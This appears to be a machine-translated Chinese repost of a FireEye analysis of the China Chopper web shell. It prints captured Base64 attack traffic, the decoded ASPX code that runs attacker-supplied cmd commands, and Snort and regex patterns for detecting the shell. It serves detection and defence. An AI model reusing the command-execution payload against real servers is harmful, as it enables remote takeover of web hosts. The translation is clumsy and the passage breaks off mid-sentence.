«

剖析中国菜刀第二部分

时间:2014-12-20 09:20     作者:admin     分类: 神器荟萃



介绍

在本系列的第一部分,我描述了中国砍刀的易于使用的界面和先进的功能 - 更卓越的综合考虑网络shell的微小尺寸:73字节的ASPX版本,4千字节的磁盘。在这篇文章中,我将解释中国砍刀平台的通用性,交付机制,流量模式和检测。我的希望是,有了这些信息,你可以消灭这种害虫从您的环境。

平台

那么,什么平台上可以运行中国菜刀?任何Web服务器能够运行JSP,ASP,ASPX,PHP或CFM的。这是大多数Web应用程序语言在那里。什么操作系统?中国斩波器具有足够的灵活性,以在Windows和Linux的透明运行。这个操作系统和应用程序的灵活性,使他们成为更危险的Web外壳。

在本系列的第一部分,我们发现中国砍刀执行使用ASPX在Windows 2003的IIS服务器上。现在,我们将显示它与PHP运行在Linux上。如图1的PHP版本的内容是一样的简约:


<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图1:此命令是所有它需要在Linux上使用PHP来运行。<br> <br> &nbsp;<br> <br> 虽然可用选项因什么平台中国砍刀上运行,Linux中的文件管理功能(见图2),类似于那些在Windows中。</p>
<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><br></p>
<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><a href="" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image002.jpg"><img width="782" height="325" class="alignnone size-full wp-image-2662 landscape-med" style="border:0px currentColor;border-image:none;" alt="image002" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image002.jpg" data-ke-src="https://mrxn.net/content/uploadfile/201504/56580223669557b619faa1a69b9d820620150418124111.jpg"></a> </p>
<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图2:文件浏览功能在目标系统上运行Linux<br> <br> &nbsp;<br> <br> 在图3所示的数据库的客户端的例子是MySQL的,而不是MS-SQL中,但它提供了许多相同的功能。</p>
<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><br></p>
<p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="297" class="alignnone size-full wp-image-2663 landscape-med" style="border:0px currentColor;border-image:none;" alt="image003" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image003.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image003.jpg"> </p>
    <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图3:从目标系统运行Linux的数据库管理<br> <br> &nbsp;<br> <br> 虚拟终端看起来熟悉(图4),但使用的Linux命令代替视窗,因为这些是由底层操作系统最终解释。</p>
    <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><br></p>
    <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="296" class="alignnone size-full wp-image-2664 landscape-med" style="border:0px currentColor;border-image:none;" alt="image004" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image004.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image004.jpg"></p>
        <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图4:从目标系统运行的Linux虚拟终端<br> <br> &nbsp;<br> <br> 交付机制<br> <br> 中国斩波的递送机制可以非常灵活,由于恶意软件的有效载荷的大小,格式,和简单。这个小的,基于文本的有效载荷可以通过以下任一机制来递送:<br> <br> &nbsp;&nbsp;&nbsp; WebDAV的文件上传<br> &nbsp;&nbsp;&nbsp; JBoss的JMX控制台或Apache Tomcat的管理页面(有关此攻击媒介的详细信息,请阅读FireEye顾问托尼·李的解释)<br> &nbsp;&nbsp;&nbsp; 与文件放置远程攻击<br> &nbsp;&nbsp;&nbsp; 从其他接入横向传播<br> <br> &nbsp;<br> 流量分析<br> <br> 现在我们已经看到了服务器侧有效载荷和用于控制Web壳客户端。现在,让我们来看看中国砍刀的流量。幸运的是,我们在服务器和客户端组件,所以我们可以开始一个数据包捕获,查看典型流量的内容。如图5所示,客户端启动使用HTTP POST方法通过TCP端口80的连接。</p>
        <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><em></em> </p>
        <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="448" class="alignnone size-full wp-image-2671 landscape-med" style="border:0px currentColor;border-image:none;" alt="image007" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image007.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image007.jpg"></p>
            <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图5:数据包捕获显示,网络流量的外壳是通过TCP 80端口的HTTP POST交通<br> <br> &nbsp;<br> <br> 因为这是TCP流量,我们可以在“遵循TCP”,在Wireshark的流(一种流行的开源网络协议分析仪,在Unix和Windows的作品)。在图6中,在顶部的红色交通从攻击(Web客户机)。在底部显示为蓝色交通从目标(网络外壳)的响应。</p>
            <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><a href="http://www.wireshark.org/" data-ke-src="http://www.wireshark.org/"></a> </p>
            <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="754" height="667" class="alignnone size-full wp-image-2672 landscape-med" style="border:0px currentColor;border-image:none;" alt="image008" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image0081.png" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image0081.png"> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图6:继TCP流之后,我们可以看到,大多数攻击者的流量是Base64编码。<br> <br> &nbsp;<br> <br> 如上述所强调的,多数攻击流量似乎Base64编码。这是没有问题的,但是,因为它可以很容易地解码。我们使用免费的提琴手网页调试器的“TextWizard”功能来发现攻击者发送。 (注:%3D是等号的URL编码表示(“=”)提琴手需要这种转换为等号正确解码。)<br> <br> 原料攻击流量:</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><strong></strong> </p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>Password=Response.Write("-&gt;|");<p style="margin:5px 0px;-ms-word-wrap:break-word;">var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">GetString(System. Convert.FromBase64String</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5n</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">LkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZX</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">N0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZX</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">RTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZS</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">hvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D")),"unsafe");}catch(err){Response.Write</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">("ERROR:// "%2Berr.message);}Response.Write("|&lt;-");Response.End();&amp;z1=Y21k&amp;z2=Y2QgL2QgImM6</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D</p></pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">如图9中,提琴手网页调试文本向导轻松地转换成原始流量的Base64为纯文本。</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="579" class="alignnone size-full wp-image-2673 landscape-med" style="border:0px currentColor;border-image:none;" alt="image009" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image009.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image009.jpg"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图9:网页调试器解码的Base64交通</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><strong>Decoded traffic:</strong> </p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>varc=newSystem.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding(65001).<p style="margin:5px 0px;-ms-word-wrap:break-word;">GetString(System.Convert.FromBase64String(Request.Item["<b>z1</b>"])));</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">vare=newSystem.Diagnostics.Process();</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">varout:System.IO.StreamReader,EI:System.IO.StreamReader;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">c.UseShellExecute=false;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">c.RedirectStandardOutput=true;c.RedirectStandardError=true;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">e.StartInfo=c;c.Arguments="/c"+System.Text.Encoding.GetEncoding(65001).</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">GetString(System.Convert.FromBase64String(Request.Item["<b>z2</b>"]));</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">Response.Write(out.ReadToEnd()+EI.ReadToEnd());</p></pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">最后,我们有更多的东西可读。然而,我们的Base64解码交通正试图解码正被存储为Z1和Z2更Base64的流量。回到我们的攻击流量,“密码”参数结束之后,我们看到了Z1和Z2参数。<br> <br> 我突出Base64编码参数Z1和Z2以下的输出:</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><br></p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;">
                                    <pre>&amp;<span style="text-decoration:underline;"><b>z1</b></span>=Y21k&amp;<span style="text-decoration:underline;"><b>z2</b></span>=Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D</pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">Base64解码参数的Z1和Z2:</p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>z1=cmdz2=cd /d "c:\inetpub\wwwroot\"&amp;whoami&amp;echo [S]&amp;cd&amp;echo [E]</pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">这也解释了客户如何与外壳进行通信。 “密码”的参数传递给被执行的代码的有效载荷。该Z1是cmd,然后Z2包含的参数通过CMD / C发送的命令提示符。所有输出发送到标准输出(stdout)回攻击者,从而创建以下响应whoami命令和当前的工作目录:</p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>-&gt;|nt authority\network service[S]C:\Inetpub\wwwroot[E]|&lt;-</pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><strong>发现<br> <br> 现在,我们了解中国砍刀的内容以及它的交通是什么样子,我们可以集中精力的方法来检测这种害虫无论是在网络和主机级别。<br> 网络<br> <br> 与标准的Snort IDS到位,这些流量可以被捕获相对容易。基思·泰勒给出了一个基本的IDS特征在他早期的中国砍刀博客文章的工作:</strong> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><a href="http://www.snort.org/" data-ke-src="http://www.snort.org/" target="_blank"></a><a href="http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html" data-ke-src="http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>alert tcp any any -&gt; any 80 ( sid:900001; content:"base64_decode";<p style="margin:5px 0px;-ms-word-wrap:break-word;">http_client_body;flow:to_server,established; content:"POST"; nocase;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">http_method; ;msg:"Webshell Detected Apache";)</p></pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">为了减少误报,我们已经收紧的Snort IDS签名专注于中国斩波通过寻找“FromBase64String”和“Z1”如下内容:</p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>alert tcp $EXTERNAL_NET any -&gt; $HTTP_SERVERS $HTTP_PORTS<p style="margin:5px 0px;-ms-word-wrap:break-word;">(msg: "China Chopper with first Command Detected";</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">flow:to_server,established; content: "FromBase64String";</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">content: "z1"; content:"POST"; nocase;http_method;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">breaking-down-the-china-chopper-web-shell-part-i.html;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">classtype:web-application-attack; sid: 900000101;)</p></pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">下面IDS特征查找“FromBase64String”和“Z”的任何组合,随后被一至三个数字的内容 - 这将找到“Z1”,“Z10”,或“Z100”为例的想法:如果第一命令(Z1)被错过了,你还是赶上随后的命令。</p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;">
                                    <pre style="text-align:left;">alert tcp $EXTERNAL_NET any -&gt; $HTTP_SERVERS $HTTP_PORTS<p style="margin:5px 0px;-ms-word-wrap:break-word;">(msg: "China Chopper with all Commands Detected"; flow:to_server,established;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">content: "FromBase64String"; content: "z"; pcre: "/Z\d{1,3}/i"; content:"POST"; nocase;http_method;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">breaking-down-the-china-chopper-web-shell-part-i.html;</p><p style="margin:5px 0px;-ms-word-wrap:break-word;">classtype:web-application-attack; sid: 900000102;)</p></pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">这两种IDS特征可以被修改为进一步优化时,深度和偏移考虑。一定要放一个有效的SID在实施前和测试签名的性能。<br> <br> 现在,我们已经讨论过检测在网络层面上,我们将看到检测在主机级别也是可以的。由于炮弹必须包含一个可预见的语法,我们可以迅速试图寻找那些在游戏的代码文件。<br> 主持人<br> <br> 许多方法可用于查找包含中国斩波文件。最快和最简单的方法,尤其是在Linux机器,很可能是使用正则表达式。如图10,在你的web目录快速的egrep可以帮助识别受感染的文件。</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><em></em> </p>
                <div class="blog-table-wrapper" style="font:12px/18px &quot;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">
                    <table style="border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td valign="top" style="font:12px/1.5 &quot;text-align:left;">
                                    <pre>egrep -re ' [&lt;][?]php\s\@eval[(]\$_POST\[.+\][)];[?][&gt;]' *.php</pre>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="311" class="alignnone size-full wp-image-2674 landscape-med" style="border:0px currentColor;border-image:none;" alt="image010" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image010.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image010.jpg"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图10:使用egrep的发现这个网站的shell<br> <br> &nbsp;<br> <br> 正如你在图10中看到,egrep的正则表达式和命令是一个强大的组合。而正则表达式可能看起来像废话,它确实是并不像它看起来那样糟糕。伊恩·阿尔创造了一些正则表达式的教程,可以帮助提高你的正则表达式的技能。这里有两个让你开始:<br> <br> &nbsp;&nbsp;&nbsp; 正则表达式基础知识<br> &nbsp;&nbsp;&nbsp; 使用正则表达式用记事本<br> <br> Windows还提供了一种通过使用本地FINDSTR命令搜索使用正则表达式的文件。</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><em></em> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="696" height="94" class="alignnone size-full wp-image-2675 landscape-med" style="border:0px currentColor;border-image:none;" alt="image011" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image011.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image011.jpg"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图11:使用FINDSTR找到中国砍刀<br> <br> &nbsp;<br> <br> 您可能已经注意到,我们不得不改变了正则表达式一点。这是必要的,以避开一些FINDSTR解释正则表达式的方式。您将运行命令如下:</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><em></em><em></em><em></em> </p>
                <pre style="color:#000000;text-transform:none;line-height:18px;text-indent:0px;letter-spacing:normal;font-size:12px;font-style:normal;font-variant:normal;font-weight:normal;word-spacing:0px;-webkit-text-stroke-width:0px;">findstr /R "[&lt;][?]php.\@eval[(]\$_POST.*[)];[?][&gt;]" *.php</pre>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">这些例子表明检测的PHP外壳。为了找到ASPX外壳,只需修改正则表达式来适应ASPX壳的语法如下所示:</p>
